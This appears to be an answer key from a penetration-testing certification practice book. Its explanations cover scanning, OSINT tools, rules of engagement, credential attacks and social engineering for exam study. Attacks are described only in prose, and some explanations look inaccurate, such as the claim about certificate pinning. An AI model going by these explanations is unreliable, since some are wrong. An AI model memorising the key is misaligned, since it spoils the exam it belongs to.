1. A. Nmap is the most commonly used command-line vulnerability scanner and is a free, open source tool. It provides a broad range of capabilities, including multiple scan modes intended to bypass firewalls and other network protection devices. Nmap is a port scanner. To scan for ports, you will want to use the -p (only scan specified ports). This option specifies which ports you want to scan and overrides the default scan. Individual port numbers or ranges are acceptable. Ranges are separated by a hyphen (for example 1–1023). The beginning and/or end values of a range may be omitted, causing nmap to use 1 and 65535, respectively. So, you can specify -p- to scan ports from 1 through 65535. Port scanning a system simply requires that nmap be installed and that you provide the target system’s hostname or IP address.

Answer 834

1. A. Among other things, the term *situational awareness* refers to a state of common understanding between all members of the penetration testing team to ensure that every team member is aware of what the others are doing.

Answer 835

1. D. The rules of engagement include the following: o The timeline when testing will be conducted o What locations, systems, applications, and other potential targets are to be included/excluded o The data handling requirements for information gathered o What behaviors to expect from the target o What resources are committed to the test o Any legal concerns that should be addressed o The when/how communication will occur o Who to contact in case of events o Who is permitted to engage in the penetration testing team

Answer 836

1. A. Normally, when NAC is implemented with IPSec, clients must meet company security policies before they are allowed to connect to the internal secure network. If they do, they are assigned a digital certificate that allows them to communicate with other systems on the internal secure network. To bypass NAC, certificate pinning can be used to assign a digital certificate to the testers’ systems without proving they are in compliance every time they connect.

Answer 837

1. D. The ncat utility is an updated and improved version of the older netcat utility.

Answer 838

1. C and E. There are a variety of tools that assist with this OSINT collection: * Censys is a web-based tool that probes IP addresses across the Internet and then provides penetration testers with access to that information through a search engine. * Fingerprinting Organizations with Collected Archives (FOCA) is an open source tool used to find metadata within Office documents, PDFs, and other common file formats. * Maltego is a commercial product that assists with the visualization of data gathered from OSINT efforts. * nslookup tools help identify the IP addresses associated with an organization. Recon-ng is a modular web reconnaissance framework that organizes and manages OSINT work. * Shodan is a specialized search engine to provide discovery of vulnerable Internet of Things (IoT) devices from public sources. * theHarvester scours search engines and other resources to find email addresses, employee names, and infrastructure details about an organization. whois tools gather information from public records about domain ownership.

Answer 839

1. D. Advanced persistent threats (APTs) are often sponsored by nation-states and thus are very well funded and have access to high-end technical resources and knowledge. As such, an APT typically poses the greatest threat of all the actors on the adversary tier list.

Answer 840

1. D. Privilege escalation attacks are frequently categorized into two major types: vertical and horizontal. Vertical escalation attacks focus on testers gaining higher privileges. Horizontal escalation attacks move sideways to other accounts or services that have the same level of privileges. An unquoted service path is a vulnerability in Windows. When a service is started, Windows tries to locate it. Usually, services are well-defined with quotation marks. But, there are times when a service path might contain spaces or are not surrounded by quotation marks. Testers can use the unquoted service paths to escalate privileges.

Answer 841

1. A. Virtual Network Computing (VNC) connections can be used to remotely manage Windows, Macintosh, or Linux systems over a network connection using a graphical user interface, as long as the necessary software is installed on both the local and remote systems.

Answer 842

1. A. Confidentiality controls seek to prevent disclosure attacks. Even though confidentiality agreements (CAs) are legal documents that help to enforce confidential relationships between two parties, this question asks why it is important to maintain the confidentiality of findings. If an attacker were to receive word of findings during a penetration test, they could use those to compromise your client’s network.

Answer 843

1. C. theHarvester is a tool available on some Linux distributions, such as Kali Linux, that can be used to query search engines to discover email addresses, employee names, and other details about the target organization.

Answer 844

1. B. When making a comparison between two values in a Ruby script to see whether they are equal, you use the == relational operator.

Answer 845

1. C. A scope creep occurs when additional items are added to the scope of an assessment. The tester has gone beyond the scope of the initial assessment agreement.

Answer 846

1. A. A ping sweep is an example of a discovery scan. The goal of a ping sweep is not to interrogate every system. Instead, it simply seeks to identify the presence of every reachable system on the network.

Answer 847

1. C. Because this is a gray box penetration test, you should probably ask the client if they want the test performed on-site or if they want you to test from a remote off-site location. An on-site test would likely produce better results, but it would also cost more because the penetration testers would incur travel expenses. An off-site test would cost less because it wouldn’t require travel expenses, but it may produce lower quality results because the testers aren’t physically on-site.

Answer 848

1. B. Nessus is a commercial vulnerability scanning tool used to scan a wide variety of devices, but it is not part of the tools available for OSINT gathering. There are a variety of tools that assist with this OSINT collection: * Censys is a web-based tool that probes IP addresses across the Internet and then provides penetration testers with access to that information through a search engine. * Fingerprinting Organizations with Collected Archives (FOCA) is an open source tool used to find metadata within Office documents, PDFs, and other common file formats. * Maltego is a commercial product that assists with the visualization of data gathered from OSINT efforts. * Nslookup tools help identify the IP addresses associated with an organization. * Recon-ng is a modular web reconnaissance framework that organizes and manages OSINT work. * Shodan is a specialized search engine to provide discovery of vulnerable Internet of Things (IoT) devices from public sources. * theHarvester scours search engines and other resources to find email addresses, employee names, and infrastructure details about an organization. * Whois tools gather information from public records about domain ownership.

Answer 849

1. B and C. The “Password must meet complexity requirements” and the “Minimum password length” Group Policy settings can be used to enforce a degree of password complexity. By default, the “Password must meet complexity requirements” policy requires passwords be at least six characters long and contain characters from three of the following four categories: uppercase letters, lowercase letters, numbers, and special characters. The minimum password length defines the least number of characters that a password may contain.

Answer 850

1. A. A gray box test is a blend of black box and white box testing. A gray box test usually provides limited information about the target to the penetration testers but does not provide full access, credentials, or configuration information. A gray box test can help focus penetration testers’ time and effort while also providing a more accurate view of what an attacker would actually encounter. In a black box test, the testers are not provided with access to or information about the target environment. Goals-based or objective-based assessments are usually designed to assess the overall security of an organization. A white box test is performed with full knowledge of the underlying network.

Answer 851

1. B. In this scenario, the **..** operators are the revealing giveaway that the attacker was attempting to conduct a directory traversal attack. This particular attack sought to break out of the web server’s root directory and access the /etc/passwd file on the server. A directory traversal attack is an HTTP attack that allows attackers to access restricted directories and execute commands outside of the web server’s root directory.

Answer 852

1. C. Forbidding employees from using external cloud-based services such as Google Drive is an example of a process-based mitigation strategy.

Answer 853

1. D. Swagger is an open source framework designed to help developers design, build, document, and test Representational State Transfer (REST) web services. REST is an alternative to the SOAP protocol. In fact, REST has started to replace SOAP as the framework of choice in most modern web applications.

Answer 854

1. C. In this scenario, the only one that is not part of manufacturing is the real-time operating system (RTOS). RTOS is any operating system intended to serve real-time applications that process data as it comes in, typically without buffer delays. Industrial control system (ICS) is a term used to describe different types of control systems and associated instrumentation, which include the devices, systems, networks, and controls used to operate and/or automate industrial processes. Supervisory control and data acquisition (SCADA) systems are used to monitor and control production processes in a wide range of industries, including manufacturing, water treatment, mining, oil refining, transportation, and power distribution. A programmable logic controller (PLC) is an industrial solid-state computer that monitors inputs and outputs and makes logic-based decisions for automated processes or machines. A PLC is an industrial digital computer that has been adapted for the control of manufacturing processes, such as assembly lines, or robotic devices, or any activity that requires high reliability control and ease of programming and process fault diagnosis.

Answer 855

1. A. A man-in-the-middle attack happens when communication between two parties is intercepted by an outside entity. Man-in-the-middle attacks are a common kind of cybersecurity attack that allows an attacker to eavesdrop on the communication between two targets. The attack takes place in between two legitimately communicating hosts, allowing the attacker to “listen” to a conversation.

Answer 856

1. C. The first step in most penetration testing engagements is determining what should be tested, often called the *scope* of the assessment. The scope of the assessment determines what penetration testers will do and how their time will be spent. Thus, this is a major impact on the budget of an assessment.

Answer 857

1. B and C. The ROE should identify which locations, systems, applications, or other potential targets are included in or excluded from the test. This should identify any third-party service providers that may be impacted by the test such as ISPs, cloud service providers, or security monitoring services. Billing and arbitration procedures will likely be addressed in the general contract between you and the client, not in the ROE. It is unlikely that the client will want you to notify their competitors that you are testing their security.

Answer 858

1. A. The Payment Card Industry Data Security Standard (PCI-DSS) is a set of security controls that businesses are required to implement to protect credit card data. For example, one of the requirements specifies that a strong password policy be in place within the organization.

Answer 859

1. D. The rules of engagement have been defined appropriately in this scenario. For example, it is quite appropriate to define what defensive behaviors the target is allowed to use during the test. Likewise, a white box test will likely include detailed information about the internal network. It’s also not uncommon for third-party service providers to be excluded from the test.

Answer 860

1. A, F, and G. In this scenario, the tester should recommend that the client increase their password complexity requirements since the tester was able to crack them by using a dictionary attack. The tester should also recommend that all employees take security awareness training, since it was a member of the IT department who gave up pertinent information when the tester used a phishing technique. The tester should also recommend upgrading the cipher suite that is used for the VPN solution. A cipher suite is a set of algorithms that help secure network connections that use Transport Layer Security (TLS) or Secure Socket Layer (SSL). The algorithms that cipher suites usually contain include a key exchange algorithm, a bulk encryption algorithm, and a message authentication code (MAC) algorithm.

Answer 861

1. C. A rainbow table is a precomputed table of hash values that can be used to reverse hash functions. For example, if a plaintext password has been protected by hashing it, you may be able to use a rainbow table to reverse the hashing function and expose the original plaintext password.

Answer 862

1. B. The default ports used by the FTP service are 20 and 21. FTP is used to transfer files between hosts over a network connection. FTP is a very old and insecure protocol. All information transmitted between the FTP server and client is sent unencrypted, including authentication information. By sniffing traffic going in and out of this host on ports 20 and 21, you may be able to capture usernames and passwords.

Answer 863

1. C. When making a comparison between two values in a PowerShell script to see if they are equal, you use the -eq relational operator.

Answer 864

1. C. When declaring a *local* variable, Ruby uses a syntax of \_*variable\_name* = *value*.

Answer 865

1. D. The \< relational operator can be used in both Python and Ruby to test whether one value is numerically less than the other.

Answer 866

1. A. In this scenario, the PowerShell command given will execute a remote script. By using the PowerShell IEX command, it will invoke an expression. The IEX cmdlet evaluates or runs a specified string as a command and returns the results of the expression or command. The PowerShell Invoke-Command cmdlet runs commands on a local or remote computer and returns all output from the commands, including errors. By using a single Invoke-Command command, you can run commands on multiple computers.

Answer 867

1. D. The laws and regulations that apply to penetration testing and penetration testers vary from state to state within the United States. That means you need to understand what laws apply to the work you’re doing. In this scenario, you need to check all federal, state, and local laws that apply to the assessment you plan to carry out. It is recommended that you retain the services of an attorney to keep yourself out of trouble.

Answer 868

1. A and E. The LLMNR protocol is loosely based on the DNS packet format and allows IPv4 and IPv6 hosts to perform name resolution for other hosts on the same local network without a DNS server. It is supported by both Windows and Linux hosts.

Answer 869

1. C and D. The greatest risks to the POS systems in this scenario are that they are exposed to the Internet and that they are running an unsupported (and therefore highly vulnerable) operating system. The client should isolate the POS systems on their own subnet away from the Internet. They should also upgrade their hardware and software to newer versions to eliminate risks from running an ancient operating system.

Answer 870

1. C. After a penetration test is complete, it is not uncommon for the client to ask the tester to come back and retest everything to make sure the problems discovered during the test have been remediated. This process is sometimes called *follow-up actions*.

Answer 871

1. A. Custom Word List (CeWL) Generator is a Ruby application that allows a tester to scour a website based on a URL and depth setting and then generate a wordlist from the files and web pages it finds. Running CeWL against a target organization’s websites can help generate a custom wordlist. Building a custom wordlist can be particularly useful if you have gathered a lot of information about your target organization.

Answer 872

1. B. The default port for an SMTP email relay service is port 25. Most Linux distributions use an email daemon such as sendmail for internal messaging. However, it can also be used to send messages over the network via SMTP on port 25. Normally, this port is firewalled on a public-facing server to prevent the daemon from being used for unauthorized email relay by spammers. Occasionally, you may find servers where someone opened port 25 and forgot to close it, making the host vulnerable.

Answer 873

1. B. Many people are naturally motivated to help others in distress. This is called *urgency*. When they believe someone needs help, they may bend or break the rules to help the person out.

Answer 874

1. B. The written report of findings contains highly sensitive information and should therefore be disposed of securely. It should not be disposed of in a manner that would allow it to be stolen or reconstructed. In this scenario, physically destroying optical discs will make it much harder to recover the data from the reports.

Answer 875

1. D. In this scenario, the confidentiality of the findings was not maintained. The blog post revealed far too much information about the client. It may take the client weeks or even months to address the issues discovered in the assessment. By publishing the findings publicly, you exposed your client to potential attacks.

Answer 876

1. C. Chkconfig is a tool for managing which run levels a service will run at. Chkconfig can be used to view or change the run level of a service. Using chkconfig --del will set the named service to not run at the current run level and will remove the persistence.

Answer 877

1. B and D. In this scenario, you first mapped vulnerabilities you found in your scans to possible exploits. Then you modified those exploits to work on the older server operating systems.

Answer 878

1. A. The penetration tester is using social proof as a motivating factor. Because it appears that more than 1,000 people have had a positive experience with the website, most of the employees will probably trust the site, even if it asks them to divulge sensitive information.

Answer 879

1. D. A *stages* communication trigger happens when the penetration test progresses from one phase to another.

Answer 880

1. A. To harden network communications on a Windows-based computer system, you should configure the Windows firewall properly. First, you should close all ports to ensure that nothing is accidentally left open. Then open ports for only those services that have been installed and are needed on the system.

Answer 881

1. C. A stealth scan enumerates hosts on the target network by manipulating the TCP three-way handshake. First, it sends the target a SYN packet. If a SYN-ACK is received, then the scanner knows that the destination host exists. The SYN-ACK also contains a limited amount of information about the host that can be captured and analyzed by the scanner.

Answer 882

1. A. This is an example of risk acceptance. You have evaluated the client’s tolerance of the impacts a penetration test could bring to the organization. It is important that the client be ready and able to accept the fact that a penetration test could cause a network outage or a service disruption.

Answer 883

1. A. The nmap 192.168.1.1 -A command enables OS detection, service version detection, script scanning, and traceroute to the remote host.

Answer 884

1. D. The penetration tester is using likeness as a motivating factor. By hiring young, friendly, and physically attractive assistants, the penetration tester is able to coerce employees of the target organization into revealing sensitive information about their employer.

Answer 885

1. C. Responder is a toolkit that is used to answer NetBIOS queries from Windows systems on a network. Responder is a powerful tool when exploiting NetBIOS responses. It can target individual systems or entire local networks, allowing you to analyze or respond to NetBIOS name services, pretending to be the system that the query is intended for. Responder exploits the trust in a service response to tell the client that the responder host is a legitimate service provider, causing it to send its hashed credentials, which the owner of the Responder host can then use to authenticate to legitimate servers.

Answer 886

1. B. A noncredentialed vulnerability scan is performed without authenticating to the network. Because of this, a noncredentialed scan usually identifies the least number of vulnerabilities.

Answer 887

1. B. Tailgating occurs when an intruder tags along with an authorized person through a physical barrier, such as a locking door or a turnstile. This happens with the authorized person’s knowledge and/or consent.

Answer 888

1. A. On Linux, a standard user can run an executable using the sudo program to elevate privileges and run the executable as the root user (or any other user on the system, if desired).

Answer 889

1. A. In this scenario, it would be best to revisit this situation during the lessons learned phase. The lessons learned session is the team’s opportunity to get together and discuss the testing process and results without the client present. Team members should freely discuss the test and offer suggestions for improvement. The lessons learned session is a good opportunity to highlight any innovative techniques used during the test that might be used in future engagements.

Answer 890

1. C and D. FTP and Telnet are considered to be unsecure services and protocols. This is because they transfer data, including authentication credentials, over the network as clear text. This information can be easily captured using a packet sniffer.

Answer 891

1. C. An organized crime threat actor is a group of cybercriminals whose main goal is financial gain. Attacks carried out by organized crime groups can last a long time, are very well-funded, and are usually quite sophisticated. A malicious insider attack occurs when someone within the organization uses the credentials they have been legitimately given to carry out an attack. A hacktivist’s attacks are usually politically motivated. A nation-state threat actor acts on behalf of a nation to inflict harm on a rival nation.

Answer 892

1. C. The Apple Remote Desktop (ARD) can be used to remotely manage Macintosh systems over a network connection using a graphical user interface.

Answer 893

1. D. The –T4 option tells nmap to scan in *aggressive* mode. This type of scan runs quite quickly. However, the speed also makes the scan easier to detect by IDS/IPS systems or the target’s IT staff.

Answer 894

1. C. A white box test is sometimes referred to as a full knowledge assessment because the penetration testers have full knowledge of the client’s network, including administrative access to all infrastructure devices and servers. This type of assessment usually provides the most comprehensive results because the testers do not need to spend time in discovery mode. They have all the information they need to immediately begin an extensive assessment.

Answer 895

1. C. The information you include in the Findings and Remediation section of your written report of findings will usually be constrained by the client’s risk appetite. For example, an organization with a higher-risk appetite may want you to only include information about high-risk or critical-risk vulnerabilities you discovered and not report medium or low-risk vulnerabilities.

Answer 896

1. B. In this scenario, you are using a conditional execution, so only one clause is executed. So, in this case, the code following the if clause will execute, making it impossible for the elif or else clause to execute. Conditional execution allows developers to write code that executes only when certain logical conditions are met. The most common conditional execution structure is the if.. then ..else statements.

Answer 897

1. D. Typically, there is no legally mandated storage time for reports after a penetration test is complete. The amount of time you are required to store the client’s report will usually be governed by your contract with the client.

Answer 898

1. C. Windows Management Instrumentation (WMI) allows for remote management and data gathering and is installed on all Windows systems, making it an attractive target for attackers and penetration testers. WMI provides users with information about the status of local or remote computer systems. It also supports actions such as the following: * The configuration of the security settings * The system properties * The permissions for authorized users and user groups * The drive labels * The scheduling of processes to run at specific times * Backing up the object repository * Enabling or disabling error logging WMI can also allow the remote execution of commands, file transfers, and data gathering from files and the Registry.

Answer 899

1. B. A gray box test is sometimes referred to as a partial knowledge assessment because the penetration testers have some knowledge of the client’s network, but they don’t have the full picture. This type of assessment best emulates a real-world malicious insider attack.

Answer 900

1. B. Of the options presented here, the best recommendation to remediate shared local administrator credentials would be to implement the Local Administrator Password Solution (LAPS) from Microsoft. This solution periodically randomizes local administrator passwords and saves those secrets in Active Directory.

Answer 901

1. B. A false positive is an error in some evaluation processes in which a condition tested for is mistakenly found to have been detected. The scanner might not have sufficient access to the target system to confirm a vulnerability, or it might simply have an error in a plug-in that generates an erroneous vulnerability report. When a scanner reports a vulnerability that does not exist, this is known as a *false positive error*.

Answer 902

1. B. In this scenario, the client has requested that you perform a black box penetration test. Since this is a black box test, you will most likely spend most of your time performing the information gathering and vulnerability identification phase. Black box tests, sometimes called *zero-knowledge* tests, are intended to duplicate what an outside attacker would encounter. Testers are not provided with access to or information about an environment, so they must gather information, discover vulnerabilities, and make their way through an infrastructure or systems just as an attacker would. This can be time-consuming for the penetration tester.

Answer 903

1. A and B. The rules of engagement (ROE) should always include the timeline for the engagement as well as a review of any laws that specifically govern the target to ensure you don’t break them. A list of other organizations that you have tested in the past or a list of the target organization’s competitors is unlikely to be specified in the rules of engagement. A detailed map of the target’s network will probably not be included in a black or gray box test.

Answer 904

1. B. When declaring an array, Bash uses the following syntax: *array\_name* = (*value1, value2, value3, ...*).

Answer 905

1. D. In this scenario, the client does not have the budget to immediately correct all of the vulnerabilities found. In this case, the best suggestion to tell the client is to correct the most critical vulnerability first and, then when funds become available, fix the other critical vulnerabilities.

Answer 906

1. C. Lock bypass is simply that. Bypassing locks without picking them. In this scenario, the tester is attempting a physical security assessment with the use an under-the-door tool, which goes underneath a door and pulls open a door handle from the inside.

Answer 907

1. B. This is an example of risk transference. Rather than avoid the risk or mitigate the risk, the client has moved the risk to the third-party processor.

Answer 908

1. A. Censys is a web-based tool that probes a given IP address. It presents whatever information it can discover about the host assigned that IP address, such as the version of SSL/TLS it uses, the cipher suite it uses, and its certificate chain. Note that some organizations put their IP addresses on a blacklist, which severely limits the amount of information that Censys can discover about them.

Answer 909

1. D. The –oG option causes nmap to write the output from the scan to a text file in a format that allows it to be quickly searched using the grep command. You must specify a filename with this option.

Answer 910

1. A. The written report of findings contains highly sensitive information and should therefore be securely handled. It should not be stored in a manner that would allow it to be easily stolen. In this scenario, burning the file to an optical disc and storing it in a secured safe would make it more difficult for the report to be stolen than the other options listed.

Answer 911

1. A and B. Rainbow tables provide a powerful way to attack hashed passwords by performing a lookup rather than trying to use brute force. A rainbow table is a precomputed listing of every possible password for a given set of password requirements, which has then been hashed based on a known hashing algorithm like MD5. A rainbow table is used to attack a hashed password in reverse. A rainbow table is generally an offline-only attack. It uses fewer compute cycles than any other forms of attack. A brute-force attack is an attempt to crack a password or username by using a trial-and-error approach with an attacker submitting many passwords or passphrases with the chance of eventually guessing the password correctly.

Answer 912

1. C. When making a comparison between two integer values in a Bash script to see whether one is greater than the other, you use the -gt relational operator.

Answer 913

1. D. Passive scanning is a method of vulnerability detection that relies on information obtained from network data that is captured from a target computer without direct interaction. The main advantage of passive scanning for an attacker is that it does not leave a trail that could alert users or administrators. The main advantage for administrators is that it doesn’t cause undesired behavior on the target computer. Passive scanning does have limitations. It is not as complete in details as an active vulnerability scan and cannot detect any applications that are not currently sending out traffic.

Answer 914

1. D. A false positive is when the system incorrectly accepts a biometric sample as being a match. Biometric sensors sometimes make mistakes for a number of reasons. The identification process compares a biometric, such as a fingerprint or iris scan that is presented to the system, against all entries in a database for a match. This is referred to as a *one-to-many* search. Live biometrics change due to age, climate, or a possible injury on a finger. Vendors refer to these threshold settings as *false acceptance rates* (FARs) and *false rejection rates* (FRRs).

Answer 915

1. C. The first step in the penetration testing process is to work with the client to clearly define the scope of the test. The scope determines what penetration testers will do and how their time will be spent. Researching the organization’s products is a task that will probably be done after the scope of work has been defined. Determining the budget and gaining authorization are subtasks that are usually completed as a part of the overall scoping process.

Answer 916

1. A. Rainbow tables are lists of precomputed hashes for all possible passwords for a given set of password rules. Rainbow table tools compare hashes to the previously calculated hashes, which match to known password values. This is done via a fairly fast database lookup, allowing “cracking” of hashed passwords, even though hashes aren’t reversible. The password file is a list of hashed values.

Answer 917

1. B. A nondisclosure agreement (NDA) is a legal document that is designed to protect the confidentiality of the client’s data and other information that the penetration tester may encounter during the test.

Answer 918

1. A and D. Open-source intelligence (OSINT) is any information that is publicly available and can be passively gathered. Because it is passively gathered, you can’t use methods that actively engage the target organization to gather OSINT. For example, running a vulnerability scan is an active method, while reading social media posts and viewing corporate tax filings are passive methods. Social Security numbers and personal tax filings are both examples of protected information that is not publicly available.

Answer 919

1. B. Conducting security awareness training with employees is an example of a people-based mitigation strategy.

Answer 920

1. A and B. These may be times that call for immediate communication to the client. The following are some common penetration testing communication triggers. Communication triggers should be done upon the completion of the testing phase, a discovery of a critical finding, or the discovery of indicators of a previous compromise. In this scenario, we would want to contact the client if the system becomes unavailable following an attempted test and if the system shows an indication of prior unauthorized access.

Answer 921

1. D. Credentialed scans require read-only access to target servers. The client should follow the principle of least privilege and limit the access available to the tester. You should consider asking for a specific “audit” account to be created with similar read-only access. A dedicated “audit” account has the advantage of showing up in the logs and instantly being recognized by everyone in IT as a potentially approved activity.

Answer 922

1. C. In this scenario, insufficient time was spent getting to know the target audience for the penetration test. Time should have been spent with the client to learn about their organization, the goals of the test, and so on. Only then should the scope be created.

Answer 923

1. B. The Remote Desktop Protocol (RDP) is used on Windows systems to display the graphical desktop of a remote Windows host on the local system over a network connection. It provides full point-and-click interactivity. It can even be used to transmit sounds from the remote system to the local system and to share files between systems.

Answer 924

1. C. This is an example of risk mitigation. Instead of completely removing the risk, the client has used a security guard as a countermeasure. The risk of unauthorized access still exists, but the use of the security guard controls that risk.

Answer 925

1. B and C. The nmap and hping utilities can be used to actively enumerate and fingerprint target systems.

Answer 926

1. E. The recon-ng utility provides a web reconnaissance framework that allows you to conduct open source reconnaissance about an organization on the Web. Censys is a web-based tool that probes a given IP address. The whois command can be used to gather information from public records about who owns a particular domain. Shodan is a specialized tool that a penetration tester can use to search public sources for evidence of an Internet of Things (IoT) device that a target organization may have deployed in their network.

Answer 927

1. D. The default port used by a DNS server is 53. The DNS service is used to resolve hostnames into IP addresses (and vice versa). If the DNS server has been poorly secured, you may be able to compromise it and poison the lookup tables, enabling you to redirect legitimate name resolution requests to a fake destination host where a variety of exploits could be implemented on client systems.

Answer 928

1. A. Most likely, you will ask the client to sign a purchase order. A purchase order is a binding agreement to make a purchase from a vendor. With a purchase order in place, your organization can justify spending time and money defining a SOW and an NDA for the engagement. Because the client is essentially “trying” your services, an MSA would not yet be required, although it may be in the future.

Answer 929

1. B, C, and D. CompTIA highlights three important post-engagement cleanup activities: * Removing any shells installed on systems during the penetration test. * Removing any tester-created accounts, credentials, or backdoors that were installed during testing. * Removing any tools that were installed during testing. * Remediation of vulnerabilities is a follow-on activity and is not conducted as part of the test. The testers should remove any shells or other tools installed during testing as well as remove any accounts or credentials that they created.

Answer 930

1. D. A replay attack is also classified as a man-in-the-middle attack.

Answer 931

1. C. The -ge relational operator can be used in both Bash and PowerShell to test whether one value is numerically greater than or equal to the other.

Answer 932

1. A and E. To harden user accounts on Windows-based computer systems, you should use Group Policy to configure account lockout. This will help slow down or even prevent brute-force or password guessing attacks. You should also immediately disable or delete all unused user accounts.

Answer 933

1. C. A *stages* communication trigger happens when the penetration test progresses from one phase to another.

Answer 934

1. D. A dictionary attack is a type of brute-force attack. However, in a dictionary attack, a list of commonly used passwords is used, one after another, in an attempt to find the right password.

Answer 935

1. C. When creating your written report of findings after completing a penetration test, you should list the vulnerabilities you discovered in the Findings and Remediation section of the report, along with how you found them.

Answer 936

1. A. In a Karma attack, the tester uses a special wireless device to listen for SSID requests from other devices and then respond as if it were the requested access point. Victims think they are connected to a legitimate network, but they are actually connected directly to the tester. The tester typically forwards victims’ traffic to the Internet, so everything seems normal. This allows the tester to inspect the victim’s traffic and capture sensitive information.

Answer 937

1. B and C. Given this scenario, the word *let* does not need to be included in the script, so it can be removed, and in Bash, the equivalent to an = is -eq, which is the arithmetic binary operator. Once these modifications are made, the script will work as expected.

Answer 938

1. D. The default port for the SMB/CIFS service using direct TCP connections is port 445. The SMB/CIFS protocol is used for file sharing, so the host in question must be a file server.

Answer 939

1. A. In this scenario, the tester should recommend that the client enable HTTP Strict Transport Security (HSTS). The HSTS response header lets a website tell browsers that it should only be accessed using HTTPS, instead of using HTTP. It is an opt-in security enhancement that is specified by a web application through the use of a special response header. Once a supported browser receives this header, that browser will prevent any communications from being sent over HTTP to the specified domain and will instead send all communications over HTTPS.

Answer 940

1. B. Interrogation (also called *questioning*) is interviewing an individual with the goal of obtaining useful information. Interrogation may involve a wide array of techniques, ranging from developing a bond with the individual to torture. With this technique, fear can be used as a motivator. However, this technique is not usually used by penetration testers.

Answer 941

1. D and E. IoT devices, such as smart appliances, televisions, and so on, tend to have the weakest inherent security. They aren’t designed with security in mind, they are difficult to manage, and vendors rarely release security updates. Embedded devices used in industrial control devices tend to suffer from the same weaknesses.

Answer 942

1. D. The default ports used by a web server are 80 (HTTP) and 443 (HTTPS). Data transmitted on port 80 is usually sent in the clear, while data sent on port 443 is encrypted using SSL/TLS.

Answer 943

1. A. PsExec is a command-line tool that lets you execute processes on remote systems and redirect console applications’ output to the local system so that the applications appear to be running locally. It is a lightweight Telnet replacement that allows you to execute processes on other systems.

Answer 944

1. C and D. A web server is associated with this domain name. It is configured to use the HTTP protocol (insecure) on port 80 and the HTTPS protocol (secure).

Answer 945

1. B and D. When running a white box assessment, you will usually want the client to white-list the testers’ user accounts in their IPS. This will prevent them from being blocked when they start probing defenses. They should also configure security exceptions that allow the penetration testers’ systems to bypass NAC security controls.

Answer 946

1. B. In a credentials brute-force attack, the tester will try to log in to the application using every username and password. Hydra is a brute-forcing tool that can crack systems using password guessing.

Answer 947

1. C. The testing agreement should contain a disclaimer indicating that the test is valid only at the point in time that it is conducted because future technological changes could expose new vulnerabilities that are currently unknown. You can’t be held liable if new exploits or vulnerabilities appear a later point in time after the test is complete.

Answer 948

1. D. By masquerading as an FBI agent, the penetration tester in this example utilized authority (and possibly fear) as a motivation factor to coerce the employee into divulging sensitive information.

Answer 949

1. C. A username and a password are both examples of something you know and therefore do not constitute multifactor authentication. A fingerprint scan is an example of something you are. Requiring a fingerprint scan would improve the security of the system because authentication factors from multiple categories would be required for users to log on.

Answer 950

1. C. The –T2 option causes nmap to scan in *polite* mode. This type of scan runs quite slowly. However, the slowness also makes the scan harder to detect.

Answer 951

1. A. Adding the echo $TargetHost line to a Bash script causes it to display the value of a variable named TargetHost on the screen.

Answer 952

1. C. The Health Insurance Portability and Accountability Act of 1996 governs healthcare organizations. They must comply with the rules and regulations specified in the act, such as requiring a risk analysis and testing the organization’s security controls.

Answer 953

1. B. NBTSTAT identifies NetBIOS workstations with an ID of \<00\>. Based on this output, you know that PROD-9 is most likely a Windows workstation (or a Linux workstation running the Samba service).

Answer 954

1. C. One of the first steps when looking to gain access to a host, system, or application is to enumerate usernames. Once usernames are guessed, targeted password-based attacks can then be attempted. A RID cycling attack attempts to enumerate user accounts through null sessions. If a tester specifies a password file, it will automatically attempt to brute force the user accounts when it’s finished enumerating. So, in this scenario, attempting RID cycling will be the next step the tester should try.

Answer 955

1. B. The SMTP protocol is used to transfer email messages between mail transfer agents (MTAs).

Answer 956

1. A. A dictionary attack is a method of breaking into a password-protected computer or server by thoroughly entering every word in a dictionary as a password. Dictionary attacks work because many computer users use ordinary words as passwords. Dictionary attacks rely on a prebuilt dictionary of words. In many cases, penetration testers can add additional specific dictionary entries to a dictionary file for their penetration test based on knowledge, this can be very beneficial in performing a dictionary attack. In this scenario, the penetration tester used social media to find additional keywords that may be beneficial in a dictionary attack.

Answer 957

1. C. A man-in-the-middle attack intercepts a communication between two systems. ARP stands for Address Resolution Protocol, and it allows the network to translate IP addresses into MAC addresses. In this scenario, the attacker wants to perform a man-in-the-middle attack; it is done by performing arpspoof -t . The -t switch specifies a particular host to ARP poison.

Answer 958

1. A. The Simple Object Access Protocol (SOAP) is a messaging protocol specification that defines how structured information can be exchanged between web applications. SOAP project files can be created from Web Services Description Language (WSDL) files.

Answer 959

1. A. The Browser Exploitation Framework (BeEF) is a penetration testing utility designed to exploit weaknesses in web browsers using client-side attacks.

Answer 960

1. A. Most likely, the vulnerability scanner generated a false positive error. The purpose of the adjudication process after a vulnerability scan is to determine the value and validity of the scan results. False positives, such as the one discussed in this scenario, should be filtered out in your final report to the client.

Answer 961

1. A. PowerShell requires the use of the $ before an array name in an assignment operation. The elements of the array are then provided as a comma-separated list. Option B would work in Bash, option C would work in Ruby or Python, and option D does not follow the correct syntax for a PowerShell command. PowerShell is much simpler in the way that you declare and use variables. You just need to remember to precede the variable name with a $, whether it’s for setting, changing, or retrieving the value stored in that variable.

Answer 962

1. C. Metasploit is launched by running msfconsole from the command line. The msfconsole command is located in the /usr/share/metasploit-framework/msfconsole directory

Answer 963

1. B. Because this is a compliance penetration test, you first need to access the PCI-DSS standards and review the requirements for the client to be considered “compliant.” Typically, the governing organization will publish checklists that you should use to assess compliance. These checklists will strongly influence the scope, budget, and schedule for the test.

Answer 964

1. B, E, and G. In this situation, since the tester was able to compromise a single workstation and is able to move laterally through the network, the best recommendations to give the client would be the following: * Use multifactor authentication. Multifactor authentication (MFA) is an authentication method in which a computer user is granted access only after successfully presenting two or more pieces of evidence (or factors) to an authentication mechanism. * Increase minimum password complexity. Complex passwords use different types of characters in unique ways to increase security, making it harder for an attacker to crack. * Enable full-disk encryption. Full-disk encryption (FDE) is encryption at the hardware level. FDE works by automatically converting data on a hard drive into a form that cannot be understood by anyone who doesn’t have the key to “undo” the conversion.

Answer 965

1. B. A discovery scan identifies the operating systems that are running on a network, maps those systems to IP addresses, and enumerates the open ports and services on those systems. Discovery scans provide penetration testers with an automated way to identify hosts that exist on the network and build an asset inventory.

Answer 966

1. A and C. After a penetration test is complete, you should meet with your teams and discuss lessons learned. You should identify what went well and what improvements need to be made. For example, you should discuss which exploits worked and which didn’t. You should document best practices for using those exploits such that you don’t have to relearn them the next time you conduct a penetration test.

Answer 967

